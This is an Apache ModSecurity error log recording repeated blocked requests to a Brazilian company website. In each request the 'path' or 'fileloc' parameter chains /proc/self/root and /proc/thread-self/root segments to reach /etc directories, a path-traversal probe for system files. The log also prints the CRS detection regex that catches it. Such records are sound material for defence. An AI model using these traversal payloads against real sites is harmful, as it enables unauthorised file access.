[Thu Mar 19 04:47:38.646456 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:38950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqGvu8EFLIOrSqIptsygAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:41.789049 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:38956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqHcdf6f5d65gmYZRCeAAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:43.099101 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:38960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqHwbLMZ6AikZjR9UslQAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:44.378928 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:38964] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqINa6ubjKNq_cu4YQxQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:45.686052 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:38972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqIda6ubjKNq_cu4YQyAAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:47:48.146010 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.241.31:38988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqJPu8EFLIOrSqIptszwAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:48:03.987756 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:58152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqM_u8EFLIOrSqIpts4gAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:48:04.130907 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:55082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqNMdf6f5d65gmYZRCjgAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:05.484693 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.243.128:57432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqNf-YZRR_7pZ7nDJcYQAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:07.927747 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.243.128:57444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqNxkFeYa1D6dYQnC9egAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:09.219095 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:57454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqOeyqAr6etmhZHNoyxwAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:10.483299 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:48584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqOgkwaGbbGflqUZCD8wAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:11.803182 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:48588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqO8df6f5d65gmYZRCkgAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:13.163020 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.243.128:48592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqPf-YZRR_7pZ7nDJcZQAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:14.542332 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.243.128:48602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqPhkFeYa1D6dYQnC9fQAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:15.881014 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.243.128:48612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqP1_V7PWP6ixUYl6LQwAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:17.195227 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:48618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqQQbLMZ6AikZjR9UspwAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:18.535340 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:48624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqQta6ubjKNq_cu4YQ9AAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:19.890629 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:43170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqQ_-YZRR_7pZ7nDJcbQAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:21.275209 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:43176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqRQbLMZ6AikZjR9UsqAAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:48:22.766887 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:43184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqRuyqAr6etmhZHNoy0QAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
